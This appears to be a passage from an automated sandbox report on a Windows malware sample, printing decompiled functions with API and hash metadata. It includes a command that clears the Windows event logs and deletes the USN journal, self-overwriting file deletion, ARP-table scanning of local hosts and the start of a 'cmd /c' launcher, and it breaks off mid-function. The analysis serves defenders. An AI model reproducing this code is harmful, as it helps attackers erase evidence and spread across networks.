                                                                                                                                                              0x04e283b5
                                                                                                                                                              0x04e283bc
                                                                                                                                                              0x04e283be
                                                                                                                                                              0x04e283c1
                                                                                                                                                              0x04e283c5
                                                                                                                                                              0x04e283c9
                                                                                                                                                              0x04e283d3
                                                                                                                                                              0x04e283dc
                                                                                                                                                              0x04e283e3
                                                                                                                                                              0x04e28401
                                                                                                                                                              0x04e283e5
                                                                                                                                                              0x04e283e5
                                                                                                                                                              0x04e283ea
                                                                                                                                                              0x04e283ef
                                                                                                                                                              0x04e283ef
                                                                                                                                                              0x04e283f1
                                                                                                                                                              0x04e283f1
                                                                                                                                                              0x04e283e3
                                                                                                                                                              0x04e2840d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2840d
                                                                                                                                                              0x04e283ab
                                                                                                                                                              0x04e283ad
                                                                                                                                                              0x04e283ad
                                                                                                                                                              0x04e283b0
                                                                                                                                                              0x04e283b0
                                                                                                                                                              0x04e283b3
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04E2832A
                                                                                                                                                              • LoadResource.KERNEL32(00000000), ref: 04E28341
                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 04E28350
                                                                                                                                                              • SizeofResource.KERNEL32(00000000), ref: 04E28368
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04E28384
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04E2838D
                                                                                                                                                              • memcpy.MSVCRT ref: 04E2839C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04E283B9
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04E283BC
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 04E283FE
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 04E28401
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04E2840A
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04E2840D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3010137425-0
                                                                                                                                                              • Opcode ID: 56031d7529d344e0585371da15aa0ccbaa899b4d509836c2c007135258b51dbf
                                                                                                                                                              • Instruction ID: fd6abbe0f89bf61281da9b4715a161b50dbb80651137888ce3de2721585c7e68
                                                                                                                                                              • Opcode Fuzzy Hash: 56031d7529d344e0585371da15aa0ccbaa899b4d509836c2c007135258b51dbf
                                                                                                                                                              • Instruction Fuzzy Hash: 2C318B71900226ABDB21AFA6DE48FAB7BB8FF44355F044264F905D6280EB35ED00CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E29154(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				int _t16;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              				int _t19;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				char _t31;
                                                                                                                                                              
                                                                                                                                                              				_t16 = FreeLibrary( *0x4e37b98); // executed
                                                                                                                                                              				 *0x4e37b8c = _t16;
                                                                                                                                                              				if(_t16 == 0) {
                                                                                                                                                              					return _t16;
                                                                                                                                                              				}
                                                                                                                                                              				_t31 = CreateFileW;
                                                                                                                                                              				 *0x4e37b98 =  *0x4e37bb4; // executed
                                                                                                                                                              				_t18 = CreateFileW(0x4e37bc8, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                              				_v12 = _t18;
                                                                                                                                                              				if(_t18 != 0) {
                                                                                                                                                              					_v8 = GetFileSize(_t18, 0);
                                                                                                                                                              					FindCloseChangeNotification(_v12); // executed
                                                                                                                                                              					_t22 = CreateFileW(0x4e37bc8, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                              					_v12 = _t22;
                                                                                                                                                              					if(_t22 != 0) {
                                                                                                                                                              						_t31 = " Oet Uet0Xet";
                                                                                                                                                              						_t24 = RtlAllocateHeap(GetProcessHeap(), 8, _v8); // executed
                                                                                                                                                              						_v16 = _t24;
                                                                                                                                                              						if(_t24 != 0) {
                                                                                                                                                              							_t30 =  &_v8;
                                                                                                                                                              							WriteFile(_v12, _t24, _v8,  &_v8, 0); // executed
                                                                                                                                                              							HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                              						}
                                                                                                                                                              						CloseHandle(_v12);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t19 = DeleteFileW(0x4e37bc8); // executed
                                                                                                                                                              				 *0x4e37b84 = _t19; // executed
                                                                                                                                                              				_t16 = E04E29016(); // executed
                                                                                                                                                              				if(_t16 != 0) {
                                                                                                                                                              					_t16 = E04E279D7(0x4e37bc8, _t30, _t31, _a4, _a8, _a12, _a16); // executed
                                                                                                                                                              				}
                                                                                                                                                              				ExitProcess(0);
                                                                                                                                                              			}












                                                                                                                                                              0x04e29161
                                                                                                                                                              0x04e29169
                                                                                                                                                              0x04e29170
                                                                                                                                                              0x04e2923c
                                                                                                                                                              0x04e2923c
                                                                                                                                                              0x04e2917b
                                                                                                                                                              0x04e29193
                                                                                                                                                              0x04e29198
                                                                                                                                                              0x04e2919a
                                                                                                                                                              0x04e2919f
                                                                                                                                                              0x04e291ac
                                                                                                                                                              0x04e291af
                                                                                                                                                              0x04e291c1
                                                                                                                                                              0x04e291c3
                                                                                                                                                              0x04e291c8
                                                                                                                                                              0x04e291cd
                                                                                                                                                              0x04e291d8
                                                                                                                                                              0x04e291de
                                                                                                                                                              0x04e291e3
                                                                                                                                                              0x04e291e6
                                                                                                                                                              0x04e291f1
                                                                                                                                                              0x04e291fe
                                                                                                                                                              0x04e291fe
                                                                                                                                                              0x04e29207
                                                                                                                                                              0x04e29207
                                                                                                                                                              0x04e291c8
                                                                                                                                                              0x04e2920e
                                                                                                                                                              0x04e29214
                                                                                                                                                              0x04e29219
                                                                                                                                                              0x04e29220
                                                                                                                                                              0x04e2922e
                                                                                                                                                              0x04e2922e
                                                                                                                                                              0x04e29234

                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNELBASE ref: 04E29161
                                                                                                                                                              • CreateFileW.KERNELBASE(04E37BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04E29198
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 04E291A3
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 04E291AF
                                                                                                                                                              • CreateFileW.KERNELBASE(04E37BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04E291C1
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E291D5
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04E291D8
                                                                                                                                                              • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 04E291F1
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04E291FB
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E291FE
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E29207
                                                                                                                                                              • DeleteFileW.KERNELBASE(04E37BC8), ref: 04E2920E
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 04E29234
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1556359713-0
                                                                                                                                                              • Opcode ID: 9b08fa486e04490354092f5f4bf5a215895e2c882842ddcd0744c6c12e37f001
                                                                                                                                                              • Instruction ID: d90d88924a4e764774545d1aabe5e27d1a8ff1adc35250f10d13e20d3c93cf8f
                                                                                                                                                              • Opcode Fuzzy Hash: 9b08fa486e04490354092f5f4bf5a215895e2c882842ddcd0744c6c12e37f001
                                                                                                                                                              • Instruction Fuzzy Hash: 292151B2901228BBDB216FA2FE0CD9FBF79EF49312F109440F605A2114D63ADD10DBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                              			E04E2808E() {
                                                                                                                                                              				short _v524;
                                                                                                                                                              				short _v526;
                                                                                                                                                              				short _v2572;
                                                                                                                                                              				void _t22;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              				signed int _t32;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              				WCHAR* _t38;
                                                                                                                                                              
                                                                                                                                                              				_v524 = 0;
                                                                                                                                                              				_t38 = L"%wswevtutil cl %ws & ";
                                                                                                                                                              				wsprintfW( &_v524, _t38,  &_v524, L"Setup");
                                                                                                                                                              				wsprintfW( &_v524, _t38,  &_v524, L"System");
                                                                                                                                                              				wsprintfW( &_v524, _t38,  &_v524, L"Security");
                                                                                                                                                              				wsprintfW( &_v524, _t38,  &_v524, L"Application");
                                                                                                                                                              				_t35 =  &_v524 - 2;
                                                                                                                                                              				do {
                                                                                                                                                              					_t22 =  *(_t35 + 2);
                                                                                                                                                              					_t35 = _t35 + 2;
                                                                                                                                                              				} while (_t22 != 0);
                                                                                                                                                              				_t32 = 0x10;
                                                                                                                                                              				_push( *0x4e37bc8 & 0x0000ffff);
                                                                                                                                                              				memcpy(_t35, L"fsutil usn deletejournal /D %c:", _t32 << 2);
                                                                                                                                                              				wsprintfW( &_v2572,  &_v524);
                                                                                                                                                              				_v526 = 0;
                                                                                                                                                              				_t30 = E04E27FB7( &_v2572, 3); // executed
                                                                                                                                                              				return _t30;
                                                                                                                                                              			}











                                                                                                                                                              0x04e280a2
                                                                                                                                                              0x04e280b5
                                                                                                                                                              0x04e280bc
                                                                                                                                                              0x04e280cc
                                                                                                                                                              0x04e280dc
                                                                                                                                                              0x04e280ec
                                                                                                                                                              0x04e280f7
                                                                                                                                                              0x04e280fa
                                                                                                                                                              0x04e280fa
                                                                                                                                                              0x04e280fe
                                                                                                                                                              0x04e28101
                                                                                                                                                              0x04e2810f
                                                                                                                                                              0x04e28110
                                                                                                                                                              0x04e28124
                                                                                                                                                              0x04e28126
                                                                                                                                                              0x04e2812d
                                                                                                                                                              0x04e2813d
                                                                                                                                                              0x04e28146

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wsprintf
                                                                                                                                                              • String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
                                                                                                                                                              • API String ID: 2111968516-1905612841
                                                                                                                                                              • Opcode ID: c5ec9448681e83c1249375c5a7baf63d991856f3f578c8dc0a0408756992bfdc
                                                                                                                                                              • Instruction ID: 4f6ed2079b680ab3924828f1500b5666c07a6ba3d060119140143eb6a8c87f40
                                                                                                                                                              • Opcode Fuzzy Hash: c5ec9448681e83c1249375c5a7baf63d991856f3f578c8dc0a0408756992bfdc
                                                                                                                                                              • Instruction Fuzzy Hash: 3511C666A0032C6ADB20D6A5CC8DEE7B7BCEF05651F000591F958D3100EA34EE84CB74
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E04E26E66(void* __ecx, struct _CRITICAL_SECTION* _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t46;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              				void* _t54;
                                                                                                                                                              				void* _t56;
                                                                                                                                                              				signed int _t57;
                                                                                                                                                              				void* _t72;
                                                                                                                                                              				struct _CRITICAL_SECTION* _t82;
                                                                                                                                                              
                                                                                                                                                              				_t67 = __ecx;
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_t82 = _a4;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(_t82 == 0 || _a8 == 0) {
                                                                                                                                                              					L11:
                                                                                                                                                              					return _v8;
                                                                                                                                                              				} else {
                                                                                                                                                              					EnterCriticalSection(_t82);
                                                                                                                                                              					_t46 = E04E26DA4(0, _t67, _t82, _a8, 0); // executed
                                                                                                                                                              					if(_t46 == 0) {
                                                                                                                                                              						_t68 =  *(_t82 + 0x20);
                                                                                                                                                              						if( *(_t82 + 0x24) >=  *(_t82 + 0x20)) {
                                                                                                                                                              							_t51 = HeapReAlloc(GetProcessHeap(), 8,  *(_t82 + 0x18), 0x3fc +  *(_t82 + 0x20) * 4);
                                                                                                                                                              							if(_t51 != 0) {
                                                                                                                                                              								 *(_t82 + 0x18) = _t51;
                                                                                                                                                              								 *(_t82 + 0x20) =  *(_t82 + 0x20) + 0xff;
                                                                                                                                                              								_v8 = E04E26E66(_t68, _t82, _a8, _a12);
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							_t54 = HeapAlloc(GetProcessHeap(), 8, 8);
                                                                                                                                                              							 *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4) = _t54;
                                                                                                                                                              							if(_t54 != 0) {
                                                                                                                                                              								_t56 = HeapAlloc(GetProcessHeap(), 8,  *(_t82 + 0x1c));
                                                                                                                                                              								 *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)) = _t56;
                                                                                                                                                              								_t57 =  *(_t82 + 0x24);
                                                                                                                                                              								_t72 =  *(_t82 + 0x18);
                                                                                                                                                              								if(_t56 == 0) {
                                                                                                                                                              									HeapFree(GetProcessHeap(), 0,  *(_t72 + _t57 * 4));
                                                                                                                                                              								} else {
                                                                                                                                                              									 *((intOrPtr*)( *(_t72 + _t57 * 4) + 4)) = _a12;
                                                                                                                                                              									memcpy( *( *( *(_t82 + 0x18) +  *(_t82 + 0x24) * 4)), _a8,  *(_t82 + 0x1c));
                                                                                                                                                              									 *(_t82 + 0x24) =  *(_t82 + 0x24) + 1;
                                                                                                                                                              									_v8 = 1;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					LeaveCriticalSection(_t82);
                                                                                                                                                              					goto L11;
                                                                                                                                                              				}
                                                                                                                                                              			}












                                                                                                                                                              0x04e26e66
                                                                                                                                                              0x04e26e69
                                                                                                                                                              0x04e26e6b
                                                                                                                                                              0x04e26e71
                                                                                                                                                              0x04e26e76
                                                                                                                                                              0x04e26f73
                                                                                                                                                              0x04e26f79
                                                                                                                                                              0x04e26e85
                                                                                                                                                              0x04e26e87
                                                                                                                                                              0x04e26e93
                                                                                                                                                              0x04e26e9a
                                                                                                                                                              0x04e26ea3
                                                                                                                                                              0x04e26ea8
                                                                                                                                                              0x04e26f48
                                                                                                                                                              0x04e26f50
                                                                                                                                                              0x04e26f55
                                                                                                                                                              0x04e26f5b
                                                                                                                                                              0x04e26f68
                                                                                                                                                              0x04e26f68
                                                                                                                                                              0x04e26eae
                                                                                                                                                              0x04e26ec1
                                                                                                                                                              0x04e26ec9
                                                                                                                                                              0x04e26ece
                                                                                                                                                              0x04e26edc
                                                                                                                                                              0x04e26ee7
                                                                                                                                                              0x04e26eeb
                                                                                                                                                              0x04e26eee
                                                                                                                                                              0x04e26ef1
                                                                                                                                                              0x04e26f29
                                                                                                                                                              0x04e26ef3
                                                                                                                                                              0x04e26ef9
                                                                                                                                                              0x04e26f0d
                                                                                                                                                              0x04e26f15
                                                                                                                                                              0x04e26f18
                                                                                                                                                              0x04e26f18
                                                                                                                                                              0x04e26ef1
                                                                                                                                                              0x04e26ece
                                                                                                                                                              0x04e26ea8
                                                                                                                                                              0x04e26f6c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26f72

                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,74655520,74654F20,?,?,04E26A84,?,?,?), ref: 04E26E87
                                                                                                                                                                • Part of subcall function 04E26DA4: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04E26E98,?,00000000,?,?,04E26A84,?,?), ref: 04E26DB5
                                                                                                                                                                • Part of subcall function 04E26DA4: LeaveCriticalSection.KERNEL32(?,?,?,04E26E98,?,00000000,?,?,04E26A84,?,?), ref: 04E26E0C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,00000000,?,?,04E26A84,?,?,?), ref: 04E26EB8
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,04E26A84,?,?,?), ref: 04E26EC1
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,04E26A84,?,?,?), ref: 04E26ED9
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,04E26A84,?,?,?), ref: 04E26EDC
                                                                                                                                                              • memcpy.MSVCRT ref: 04E26F0D
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,04E26A84,?,?,?), ref: 04E26F26
                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,04E26A84,?,?,?), ref: 04E26F29
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,?,04E26A84,?,?,?), ref: 04E26F41
                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,04E26A84,?,?,?), ref: 04E26F48
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,04E26A84,?,?,?), ref: 04E26F6C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$CriticalProcessSection$Alloc$EnterLeave$Freememcpy
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 1369668251-3175316637
                                                                                                                                                              • Opcode ID: 8456348ad0532e56bbc8a2d7962736be1df2cf560be76735ed0d4d4bf139e0a9
                                                                                                                                                              • Instruction ID: ccbbdb798185944277962b8f590037efff967764eff1133802145d50f3726608
                                                                                                                                                              • Opcode Fuzzy Hash: 8456348ad0532e56bbc8a2d7962736be1df2cf560be76735ed0d4d4bf139e0a9
                                                                                                                                                              • Instruction Fuzzy Hash: 7F316971600A04EFEB219FAACE44E6AB7F5FF88305F104A18E94687651DB32F911CF50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                              			E04E2742C(intOrPtr _a4) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				long _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				short _v88;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				void* _t33;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				signed char* _t46;
                                                                                                                                                              				long _t49;
                                                                                                                                                              				intOrPtr* _t51;
                                                                                                                                                              				void* _t54;
                                                                                                                                                              
                                                                                                                                                              				_t51 = __imp__GetIpNetTable;
                                                                                                                                                              				_t49 = 0;
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t24 =  *_t51(0,  &_v8, 0); // executed
                                                                                                                                                              				if(_t24 != 0xe8) {
                                                                                                                                                              					if(_t24 != 0x7a) {
                                                                                                                                                              						L15:
                                                                                                                                                              						return _v20;
                                                                                                                                                              					}
                                                                                                                                                              					_t44 = HeapAlloc(GetProcessHeap(), 0, _v8);
                                                                                                                                                              					_v16 = _t44;
                                                                                                                                                              					if(_t44 == 0) {
                                                                                                                                                              						L14:
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					_t29 =  *_t51(_t44,  &_v8, 0); // executed
                                                                                                                                                              					if(_t29 != 0) {
                                                                                                                                                              						L13:
                                                                                                                                                              						HeapFree(GetProcessHeap(), _t49, _t44);
                                                                                                                                                              						goto L14;
                                                                                                                                                              					}
                                                                                                                                                              					_v20 = 1;
                                                                                                                                                              					_v12 = 0;
                                                                                                                                                              					if( *_t44 <= 0) {
                                                                                                                                                              						goto L13;
                                                                                                                                                              					}
                                                                                                                                                              					_v24 = 3;
                                                                                                                                                              					_t46 = _t44 + 0x16;
                                                                                                                                                              					do {
                                                                                                                                                              						_push(4);
                                                                                                                                                              						asm("repe cmpsb");
                                                                                                                                                              						if(0 != 0) {
                                                                                                                                                              							asm("sbb eax, eax");
                                                                                                                                                              							asm("sbb eax, 0xffffffff");
                                                                                                                                                              						}
                                                                                                                                                              						if(0 == 0) {
                                                                                                                                                              							wsprintfW( &_v88, L"%u.%u.%u.%u",  *(_t46 - 2) & 0x000000ff,  *(_t46 - 1) & 0x000000ff,  *_t46 & 0x000000ff, _t46[1] & 0x000000ff);
                                                                                                                                                              							_t54 = _t54 + 0x18;
                                                                                                                                                              							E04E26B95( &_v88, 0, _a4);
                                                                                                                                                              						}
                                                                                                                                                              						_v12 = _v12 + 1;
                                                                                                                                                              						_t33 = _v16;
                                                                                                                                                              						_t46 =  &(_t46[0x18]);
                                                                                                                                                              					} while (_v12 <  *_t33);
                                                                                                                                                              					_t44 = _t33;
                                                                                                                                                              					_t49 = 0;
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}


















                                                                                                                                                              0x04e27433
                                                                                                                                                              0x04e2743a
                                                                                                                                                              0x04e27442
                                                                                                                                                              0x04e27445
                                                                                                                                                              0x04e27448
                                                                                                                                                              0x04e2744f
                                                                                                                                                              0x04e2745b
                                                                                                                                                              0x04e27512
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27512
                                                                                                                                                              0x04e27473
                                                                                                                                                              0x04e27475
                                                                                                                                                              0x04e2747a
                                                                                                                                                              0x04e27511
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27511
                                                                                                                                                              0x04e27486
                                                                                                                                                              0x04e2748a
                                                                                                                                                              0x04e27502
                                                                                                                                                              0x04e2750b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2750b
                                                                                                                                                              0x04e2748c
                                                                                                                                                              0x04e27493
                                                                                                                                                              0x04e27498
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2749a
                                                                                                                                                              0x04e274a1
                                                                                                                                                              0x04e274a4
                                                                                                                                                              0x04e274a4
                                                                                                                                                              0x04e274af
                                                                                                                                                              0x04e274b1
                                                                                                                                                              0x04e274b3
                                                                                                                                                              0x04e274b5
                                                                                                                                                              0x04e274b5
                                                                                                                                                              0x04e274ba
                                                                                                                                                              0x04e274d8
                                                                                                                                                              0x04e274de
                                                                                                                                                              0x04e274e9
                                                                                                                                                              0x04e274e9
                                                                                                                                                              0x04e274ee
                                                                                                                                                              0x04e274f1
                                                                                                                                                              0x04e274f7
                                                                                                                                                              0x04e274fa
                                                                                                                                                              0x04e274fe
                                                                                                                                                              0x04e27500
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27500
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04E27448
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 04E27466
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E2746D
                                                                                                                                                              • GetIpNetTable.IPHLPAPI(00000000,?,00000000), ref: 04E27486
                                                                                                                                                              • wsprintfW.USER32 ref: 04E274D8
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04E27504
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2750B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ProcessTable$AllocFreewsprintf
                                                                                                                                                              • String ID: Oet Uet0Xet$%u.%u.%u.%u
                                                                                                                                                              • API String ID: 2259129056-2591814563
                                                                                                                                                              • Opcode ID: 8af6c6407c0e80a98deeec400074a1188631f3faa80d240ae5847ea2c7b230d4
                                                                                                                                                              • Instruction ID: 05a5da0c47053261ff011f68fc137c098d6ecd14c38dae6ad05b0b77a24509fc
                                                                                                                                                              • Opcode Fuzzy Hash: 8af6c6407c0e80a98deeec400074a1188631f3faa80d240ae5847ea2c7b230d4
                                                                                                                                                              • Instruction Fuzzy Hash: 813193B2D00129AFDB118FA5CE84DBFBBBCEF89305F140556E901E6145D678AA05DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E27FB7(intOrPtr _a4, signed int _a8) {
                                                                                                                                                              				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                              				struct _STARTUPINFOW _v88;
                                                                                                                                                              				short _v1648;
                                                                                                                                                              				short _v1650;
                                                                                                                                                              				short _v3696;
                                                                                                                                                              				char* _t20;
                                                                                                                                                              				char* _t21;
                                                                                                                                                              				int _t26;
                                                                                                                                                              				void* _t35;
                                                                                                                                                              				long _t36;
                                                                                                                                                              				long _t37;
                                                                                                                                                              				int _t38;
                                                                                                                                                              
                                                                                                                                                              				_t38 = 0;
                                                                                                                                                              				wsprintfW( &_v3696, L"/c %ws", _a4);
                                                                                                                                                              				_v1650 = 0;
